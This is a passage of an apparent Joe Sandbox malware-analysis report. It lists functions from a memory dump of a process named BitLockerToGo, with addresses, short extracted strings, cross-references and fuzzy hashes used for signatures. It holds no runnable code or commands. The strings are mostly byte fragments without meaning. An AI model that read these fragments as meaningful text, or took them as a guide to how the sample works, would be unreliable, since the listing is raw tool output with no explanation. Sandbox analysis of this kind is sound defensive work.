Opcode Fuzzy Hash: 2e30f9b80b199b882e282ec32b90202ca212531dc6563bc9d7bcf428ae19cc36
Instruction Fuzzy Hash: EFB1457450C380ABC300AF55E990A2EFBF0AF96704F988D1DE4D89B262D379D954CB5B

Function 0044CEC1 Relevance: 4.6, Strings: 3, Instructions: 852COMMON

Download Yara Rule

Strings

O8>>, xrefs: 0044D513, 0044D51B
m_67, xrefs: 0044D023
m_67, xrefs: 0044D043, 0044D04B

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: O8>>$m_67$m_67
API String ID: 0-49608993
Opcode ID: 74731178b806a578c8d2647dc40edc3a678ee5f97cc7927f6c320d5fdbca4340
Instruction ID: 232ac304c95635ee97f52281282a4310fd5c9537b1f2995cf498a4457ef71799
Opcode Fuzzy Hash: 74731178b806a578c8d2647dc40edc3a678ee5f97cc7927f6c320d5fdbca4340
Instruction Fuzzy Hash: 6542C935A08351CFDB04DF28E89062EB7F2FB8A315F09886EE98597392D739D910CB55

Function 0044CFB0 Relevance: 4.6, Strings: 3, Instructions: 817COMMON

Download Yara Rule

Strings

O8>>, xrefs: 0044D513, 0044D51B
m_67, xrefs: 0044D023
m_67, xrefs: 0044D043, 0044D04B

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: O8>>$m_67$m_67
API String ID: 0-49608993
Opcode ID: 19f75721a4983c51ad79ed9faf94e28074f5c16563f04bfdd2cd16457fe40cf0
Instruction ID: 3b813e86e39071628e00b6b27f7a9edbeb2e2cbff9c79d668c0eff3885300c2c
Opcode Fuzzy Hash: 19f75721a4983c51ad79ed9faf94e28074f5c16563f04bfdd2cd16457fe40cf0
Instruction Fuzzy Hash: D542BA35A08351CFDB04DF28E89062EB7E2FF8A315F09886DE98587392D739D914CB56

Function 00415D94 Relevance: 4.3, Strings: 3, Instructions: 502COMMON

Download Yara Rule

Strings

k_, xrefs: 0041640B
2, xrefs: 004166B4
HOL, xrefs: 00416744, 0041674D

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2$HOL$k_
API String ID: 0-2473541160
Opcode ID: 2bf4a865f2d1204277eb15e7a1f0450b4a88d025694c6b9206948c933e9b5579
Instruction ID: 13b19784cfaab8ccc934783860d442d702caa7832f85298b4b34b4820a23e7ae
Opcode Fuzzy Hash: 2bf4a865f2d1204277eb15e7a1f0450b4a88d025694c6b9206948c933e9b5579
Instruction Fuzzy Hash: 93F17C719083809FD704DF64D880A6FBBE5BF86308F050D2EF59597292E7B8D948CB5A

Function 0042F4B1 Relevance: 4.2, Strings: 3, Instructions: 426COMMON

Download Yara Rule

Strings

UNOc, xrefs: 0042F951
Q^\X, xrefs: 0042F959
KFCI, xrefs: 0042F971

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: KFCI$Q^\X$UNOc
API String ID: 0-1593643587
Opcode ID: c6dcac94329364ad2bba54b254a4d764214d874a40fc363fe6ec4d606bf5eddc
Instruction ID: 519e9462165d6959e7f10fdf8959d2d44fc31aaac10bfe0435b9be88c65eb196
Opcode Fuzzy Hash: c6dcac94329364ad2bba54b254a4d764214d874a40fc363fe6ec4d606bf5eddc
Instruction Fuzzy Hash: A6E1CEB16083919FC3009F24E45062FBBF1AF9A309F95487EE4C59B352D738E909CB5A

Function 004162B3 Relevance: 4.2, Strings: 3, Instructions: 412COMMON

Download Yara Rule

Strings

k_, xrefs: 0041640B
2, xrefs: 004166B4
HOL, xrefs: 00416744, 0041674D

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 2$HOL$k_
API String ID: 0-2473541160
Opcode ID: 86e4f2715fab7190e97c76d097b3db0bae4a938d46928ba7ecbc1bdd286f9d91
Instruction ID: 2858954ba825b4a38771b4fb05dda6e582ebb4980f1b2958aaf0e4782c6626d6
Opcode Fuzzy Hash: 86e4f2715fab7190e97c76d097b3db0bae4a938d46928ba7ecbc1bdd286f9d91
Instruction Fuzzy Hash: C4E169B19083809BD704DF64D890A6FBBE5BF86308F050D2DF49597292E7B8D948CB5A

Function 00408230 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

), xrefs: 004082B6
IEND, xrefs: 00408680
), xrefs: 004082AC

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 728d59fc10234bb06920bc2eeaadd9ee79d29d1820bead2ccc31db2d01a3efb6
Instruction ID: d57e7b69ee6965f4043e31d249496a836b4811152c45569cae9df19f9acb9dbe
Opcode Fuzzy Hash: 728d59fc10234bb06920bc2eeaadd9ee79d29d1820bead2ccc31db2d01a3efb6
Instruction Fuzzy Hash: 30E1B071A087019FD310DF29C88571BBBE0BB95308F144A3EE995A73C2D779E915CB8A

Function 0042EF80 Relevance: 4.1, Strings: 3, Instructions: 371COMMON

Download Yara Rule

Strings

=:;8, xrefs: 0042EFC3, 0042EFCB
], xrefs: 0042F330
#, xrefs: 0042F328

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: =:;8$#$]
API String ID: 2994545307-1481607393
Opcode ID: 573eb233a33a1bae4601777efb88394ca238d6098f3e202cd156dede8a9bf5a1
Instruction ID: 900ecc8272292148175adb74d28a2397bec521b14317d4c115bbde8cea51e4cb
Opcode Fuzzy Hash: 573eb233a33a1bae4601777efb88394ca238d6098f3e202cd156dede8a9bf5a1
Instruction Fuzzy Hash: 3FB1FF70A083118BD714DF58E890A2BB7F1EF86304FD4493EE5858B352E339D819CB5A

Function 0044D380 Relevance: 3.1, Strings: 2, Instructions: 610COMMON

Download Yara Rule

Strings

O8>>, xrefs: 0044D513, 0044D51B
56B, xrefs: 0044D382

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 56B$O8>>
API String ID: 0-2093402670
Opcode ID: 83692e0081b08a8aea1661f5de5048e3812a50eb271c0cf31c0479f994857609
Instruction ID: 6679fc3517966fafd000101fef996e9031953217631f79917e724e7c9d4a4d7d
Opcode Fuzzy Hash: 83692e0081b08a8aea1661f5de5048e3812a50eb271c0cf31c0479f994857609
Instruction Fuzzy Hash: 2902D035A08351DFD704EF28D89462EB7E2EF8A315F09882EE8C587392D739D914CB56

Function 004358E0 Relevance: 3.0, Strings: 2, Instructions: 477COMMON

Download Yara Rule

Strings

XC, xrefs: 004374F4
J(Z4, xrefs: 00437391

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: J(Z4$XC
API String ID: 0-3899150908
Opcode ID: 223988fbe5915f1fb443b72346395762fe6953837d8b68b0c43c04e9ad290305
Instruction ID: 67ee5b21e7425144a720bcc1f7c95f1143e8f84e0c3d747c6ecfe2e7a4c3c33d
Opcode Fuzzy Hash: 223988fbe5915f1fb443b72346395762fe6953837d8b68b0c43c04e9ad290305
Instruction Fuzzy Hash: 07028070508B808BE7B5CF35C4947E3BBE0AF1A305F5858AED4EA8B752DB39A445CB14

Function 00403670 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

Inf, xrefs: 004036BE
NaN, xrefs: 004036C5

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: 309b7696e2acdfbccc391d79969e82606d1b9913b161761e2f4b54731984feb6
Instruction ID: fd254fa9c8f30905700c9d236e2e6fe008d3178af9140e5ee8d79f8e00da3611
Opcode Fuzzy Hash: 309b7696e2acdfbccc391d79969e82606d1b9913b161761e2f4b54731984feb6
Instruction Fuzzy Hash: E6E1B4B1A083019BC704CF28C88161ABBE5EBC4754F24C93EF899E73D0E678DD458B86

Function 0041EA60 Relevance: 2.9, Strings: 2, Instructions: 430COMMON

Download Yara Rule

Strings

P%&', xrefs: 0041ED60
T!Z#, xrefs: 0041ED55

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: P%&'$T!Z#
API String ID: 0-949746056
Opcode ID: bba3877ab01641ba8b208a2e023cd201ad30538d19c056e9c0ca7c6059c01726
Instruction ID: ce8a34dde99aa98ffde9730a0efbd7a0428ab999411933eaca7a64db798c77c4
Opcode Fuzzy Hash: bba3877ab01641ba8b208a2e023cd201ad30538d19c056e9c0ca7c6059c01726
Instruction Fuzzy Hash: AAD18D74508340DFE7309F15D891BEBB7E6FF89349F04092DE8898B292E3399951CB5A

Function 0044C780 Relevance: 2.9, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

P, xrefs: 0044C928
ejkh, xrefs: 0044CAA3, 0044CAAB

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: P$ejkh
API String ID: 0-97858129
Opcode ID: cf88b6ff9fe0f491cec4ee97f90de090cd2baaf4b4b809f492397846cf82f2c2
Instruction ID: 92d1b918114daf9efe66172f22e5ed40ce2ecf105ede8555e83976238d2d68f8
Opcode Fuzzy Hash: cf88b6ff9fe0f491cec4ee97f90de090cd2baaf4b4b809f492397846cf82f2c2
Instruction Fuzzy Hash: D7D137329082744FD725CE18949072FB7E1EB85758F1A863DE8B6AB381DB78DC0587C6

Function 004296A0 Relevance: 2.9, Strings: 2, Instructions: 408COMMON

Download Yara Rule

Strings

turs, xrefs: 004298C6
!, xrefs: 004296C2

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: !$turs
API String ID: 0-3355582263
Opcode ID: 260f4dba203c16f5e000206252bd7e8ca3511dc5c62e30d12f99252f3b49ad7b
Instruction ID: 05bd61ea295c1db44079e372fbb371e913b3eb9fa0eac021b26ea4f530f5555b
Opcode Fuzzy Hash: 260f4dba203c16f5e000206252bd7e8ca3511dc5c62e30d12f99252f3b49ad7b
Instruction Fuzzy Hash: 76C1CFB16083209BD710EF15E891A2BB7E5FF96314F88091EE8C597351E339DD50CBAA

Function 0043704A Relevance: 2.9, Strings: 2, Instructions: 365COMMON

Download Yara Rule

Strings

XC, xrefs: 004374F4
J(Z4, xrefs: 00437391

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: J(Z4$XC
API String ID: 0-3899150908
Opcode ID: ace4c83acb50412ce84b1187bd21bd46124f82a93d3a0e4232659550e344acf0
Instruction ID: 4cb03df0b71fae2808980f8ce6c0028df787a1cc5f70ef6d64392785dec194f0
Opcode Fuzzy Hash: ace4c83acb50412ce84b1187bd21bd46124f82a93d3a0e4232659550e344acf0
Instruction Fuzzy Hash: 79D19F70508B808ED776CF3584507E3BBE1AF1B304F58589ED4EA8B392DB39A449CB55

Function 0042261A Relevance: 2.8, Strings: 2, Instructions: 296COMMON

Download Yara Rule

Strings

P)B, xrefs: 0042294A
de, xrefs: 004226AD

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: P)B$de
API String ID: 0-1133355487
Opcode ID: c6c54c190c3d3d220acec8b253f537143515a420deacb2b250ab2ad24b9325fa
Instruction ID: 88bafb79a9383502ce9b51d31afa3fa557ae85d9e5d681e93db467b0071469fd
Opcode Fuzzy Hash: c6c54c190c3d3d220acec8b253f537143515a420deacb2b250ab2ad24b9325fa
Instruction Fuzzy Hash: 4E818A746083109BC710EF18D891A2BB7F0FF95354F948A0DE8D58B3A1E3B9D944CB9A

Function 0044BF00 Relevance: 2.8, Strings: 2, Instructions: 296COMMON

Download Yara Rule

Strings

ejkh, xrefs: 0044C0D4, 0044C0DD
ejkh, xrefs: 0044BF44, 0044BF50

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: ejkh$ejkh
API String ID: 2994545307-1683579419
Opcode ID: 33c08a8d1c022bb2a0670eb3ad1e0845fbadf2d715c9b2a8b523e713f545c59a
Instruction ID: 6109ecdab254fb2a84866b5a7f6fd2f987ca642f470b3f946a520b22522b07a9
Opcode Fuzzy Hash: 33c08a8d1c022bb2a0670eb3ad1e0845fbadf2d715c9b2a8b523e713f545c59a
Instruction Fuzzy Hash: 5891C071A09300ABF760DB54CC81B6BB7E5FB89354F58882EF58483352E774E950CB9A

Function 00422F33 Relevance: 2.7, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

8?, xrefs: 00423003, 0042300B
ex, xrefs: 004230BE

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 8?$ex
API String ID: 0-1918030203
Opcode ID: f25d9625d77b84081922754e414611ab1ef82e3d302180924ac1441c230b2d51
Instruction ID: c7eb3d849b1dbef24f5be104c766f64239757f49175bcf3f9b1e04eb79858fad
Opcode Fuzzy Hash: f25d9625d77b84081922754e414611ab1ef82e3d302180924ac1441c230b2d51
Instruction Fuzzy Hash: 9B6169B46083508BC310AF15E851A2BBBF0EF96755F44495EF4C48B362E33AD951CB6B

Function 0044E4A0 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

7654, xrefs: 0044E543, 0044E54B
@, xrefs: 0044E508

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: 7654$@
API String ID: 2994545307-3850321529
Opcode ID: 5ba37f5cbfb32a11152432733a680a0384ba7a43fb8f8fc8452920c386628e8d
Instruction ID: f05359b8bfef05acb6afe6b13e0c7f706cb9cb59c255eede04f0a127241b0944
Opcode Fuzzy Hash: 5ba37f5cbfb32a11152432733a680a0384ba7a43fb8f8fc8452920c386628e8d
Instruction Fuzzy Hash: 95319C31909304ABE314DF59D841A2BFBF5FF85308F14892DE58893351E339D9148B9A

Function 0044D2A0 Relevance: 1.9, Strings: 1, Instructions: 619COMMON

Download Yara Rule

Strings

O8>>, xrefs: 0044D513, 0044D51B

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: O8>>
API String ID: 0-1223632265
Opcode ID: b9a1d19b695b7dd3da0ab6021dfc95da6b7703ba8a7d1fa1655d1c93f930b232
Instruction ID: a8cfcff7860a57173d8781922f03dfbedb6e729b1cdee4d36d208f511f3ecee7
Opcode Fuzzy Hash: b9a1d19b695b7dd3da0ab6021dfc95da6b7703ba8a7d1fa1655d1c93f930b232
Instruction Fuzzy Hash: BB12BC35A08351CFD704DF28E89062EB7E2EF8A715F09886DE9C987392D739D914CB46

Function 00448150 Relevance: 1.8, Strings: 1, Instructions: 556COMMON

Download Yara Rule

Strings

f, xrefs: 00448308

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: 4d44d7a4e9f0a579b13af5fb0515986099fe73a3d20fc2d208725bcbd7a298d2
Instruction ID: 7e9b4078db1b3f6e3c4caa652b1d7b9ddb3392e47a972e5c4b5d965121010734
Opcode Fuzzy Hash: 4d44d7a4e9f0a579b13af5fb0515986099fe73a3d20fc2d208725bcbd7a298d2
Instruction Fuzzy Hash: E512CE715083409FE714DF18C890A2FB7E5BB88314F188A6EF9E597391DB39D805CB96

Function 00404DE0 Relevance: 1.8, Strings: 1, Instructions: 547COMMON

Download Yara Rule

Strings

%1.17g, xrefs: 0040508F

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: %1.17g
API String ID: 0-1551345525
Opcode ID: 381bcf74c1d99064d75cdd1a959552a0e2e26b1e7842bf52acb99e5cc74193cb
Instruction ID: 49ee3612987e44d2cd708a3ce49374b82cd2696b0ea928a69fdd11e18ccc3a80
Opcode Fuzzy Hash: 381bcf74c1d99064d75cdd1a959552a0e2e26b1e7842bf52acb99e5cc74193cb
Instruction Fuzzy Hash: A212C4B1A08B428BE7158E15948032BBBD2EFD1344F19857EDD45AB3C1E7B9CC45CB8A

Function 00429440 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00451B80,00000000,00000001,00451B70), ref: 00429469

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 4193af8f50bb92a85bcd6d7ae7dafceef34b5deb1fc6e6e8a174d23fac2887f2
Instruction ID: f18f008157d92d502fe5b7f6b4db06061728571b0a3dc1ff94daef9bab9963b0
Opcode Fuzzy Hash: 4193af8f50bb92a85bcd6d7ae7dafceef34b5deb1fc6e6e8a174d23fac2887f2
Instruction Fuzzy Hash: FB51FFB1704220ABDB20AB24DC92B7733A4EF81358F084559F985CB391F379EC01C72A

Function 00415E7C Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

B_A, xrefs: 00415F05

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: B_A
API String ID: 0-2963779617
Opcode ID: ea06e16ea68d9111e66ccc00d4f8f217e992927d5680b60877717dd90942d7e0
Instruction ID: 000e17e983ed3f21d5657702038785e31e5eef33463e6a3e0477bbad32c68260
Opcode Fuzzy Hash: ea06e16ea68d9111e66ccc00d4f8f217e992927d5680b60877717dd90942d7e0
Instruction Fuzzy Hash: 5BD10372908310CBC710AF68D8806AAB3F1AFC5718F19097EF48597391E739DD85C78A

Function 00433B40 Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

", xrefs: 00433E28

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 2f8dbb603814d75b0aa5db6d496d70e4079a6194488cf71c4ae71ea14b12c313
Instruction ID: 67a239d26655484f3bf1301acd2ff70a6245cbb83f0bb20b0ce808db4174e1fc
Opcode Fuzzy Hash: 2f8dbb603814d75b0aa5db6d496d70e4079a6194488cf71c4ae71ea14b12c313
Instruction Fuzzy Hash: 7ED114B2A083155FD714DE15848076BB7EAAB88315F18952EE8998B382D73CEE04C7C6

Function 0044D680 Relevance: 1.6, Strings: 1, Instructions: 380COMMON

Download Yara Rule

Strings

O8>>, xrefs: 0044D7D3, 0044D7DB

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: O8>>
API String ID: 0-1223632265
Opcode ID: a765043e5bfb9f15a3540153ef5aaf88d4eafe5c53ba6de873486b1e6a6d2875
Instruction ID: ee97f5674bd64c49e328245b4f42febc681d58fb1984c740fff618516a8e9dd6
Opcode Fuzzy Hash: a765043e5bfb9f15a3540153ef5aaf88d4eafe5c53ba6de873486b1e6a6d2875
Instruction Fuzzy Hash: 9FB1CE34608351DBE704EF28D89462EFBE5EF8A305F49882DE8C587352D739D914CB5A

Function 00430352 Relevance: 1.6, Strings: 1, Instructions: 356COMMON

Download Yara Rule

Strings

(C, xrefs: 0043043D

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: (C
API String ID: 0-2472845357
Opcode ID: b9f64b645f0d6fd872b96679e30e8837f8712b94f1f122b68a37cbd1479336af
Instruction ID: e44b51030cae377da88a28c31eab9a1a2a8abc0f1b86912725fac8c0f49f7c66
Opcode Fuzzy Hash: b9f64b645f0d6fd872b96679e30e8837f8712b94f1f122b68a37cbd1479336af
Instruction Fuzzy Hash: 15C1F171A08381CFD314CF28D86071ABBE2AF8A315F09876DE5A55B292C735DD45CB86

Function 00435C4E Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

^FH., xrefs: 00435DC4

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ^FH.
API String ID: 0-2599919165
Opcode ID: a4fd2eb27914367408ef5203c5557663c58d99d6f834f807b095c9d2944d715e
Instruction ID: 69a648de5ac41ab3ca53dfed2cc96e5b5cd47915c982b37e126e69002e00b19f
Opcode Fuzzy Hash: a4fd2eb27914367408ef5203c5557663c58d99d6f834f807b095c9d2944d715e
Instruction Fuzzy Hash: 0FA19E70405F808AD7218F3688547A7BBF0AF1F316F58299ED4DB8B692D739A445CF28

Function 0040A3D0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 0040A506

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 8e688d7c8051593939176c0d8c4f7d679b30cbecd3736a802c147730e791648c
Instruction ID: fb455069df6a345f7b46480592b139316ed42160f229a9eff66145ff686d504e
Opcode Fuzzy Hash: 8e688d7c8051593939176c0d8c4f7d679b30cbecd3736a802c147730e791648c
Instruction Fuzzy Hash: 25B139711093819FC325CF28C88461BFBE0AFA9704F484E2DE5D997782D675E918CB67

Function 0044D8A2 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

O8>>, xrefs: 0044D7D3, 0044D7DB

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: O8>>
API String ID: 0-1223632265
Opcode ID: 13d88569e1c516728ab8fe3d672cb437c61afb3fadf46d681e5b2cec39bb9e5b
Instruction ID: 46b88aac46df057f4bfb700a954fa91a996b885b1e03ad5472ebde1672c0ffd4
Opcode Fuzzy Hash: 13d88569e1c516728ab8fe3d672cb437c61afb3fadf46d681e5b2cec39bb9e5b
Instruction Fuzzy Hash: 5171D135608351CFE704DF28D89422BB7E2EF8A315F09986DE89587392D739D904CB45

Function 0044E890 Relevance: 1.5, Strings: 1, Instructions: 258COMMON

Download Yara Rule

Strings

7654, xrefs: 0044E8B3, 0044E8BB

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 7654
API String ID: 0-4024152101
Opcode ID: bf660e12c92576d91e8fe7f4f20bcf56197dfb69d074ca1e12dc117926c9252a
Instruction ID: dcf8c7232b8d45b1be24c4a80646cedf94a4d103140d9678f732113a9cb96762
Opcode Fuzzy Hash: bf660e12c92576d91e8fe7f4f20bcf56197dfb69d074ca1e12dc117926c9252a
Instruction Fuzzy Hash: 6381A0746083419BE724DF2AC880A2BB7E1FF89754F04892DE585D7391E739EC50CB5A

Function 00433FF0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 004341EE

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: cec2056cc2f749434f83c2e1e18c6e47efcd3b7deb4c561a9166aa67287abc19
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: EE711632B083154BD718CE28D98035FBBE2ABCD750F29956FF5949B391C239EC45878A

Function 0043B9A0 Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0043BB8F

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-442858466
Opcode ID: a2069df313a64c168ab59c874b22645af7e1f7fcff4030784941d1e8b816e92f
Instruction ID: bdb75b211e380c9bf139c181739ac73c81141d080b94e2e712ae27c70c8e02f0
Opcode Fuzzy Hash: a2069df313a64c168ab59c874b22645af7e1f7fcff4030784941d1e8b816e92f
Instruction Fuzzy Hash: 6B612C33B5999047C728993C5C523B96A83CBDA330F2D937BE7718B3E5DA1C88069395

Function 0040175B Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0123456789ABCDEFXP, xrefs: 0040177D

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFXP
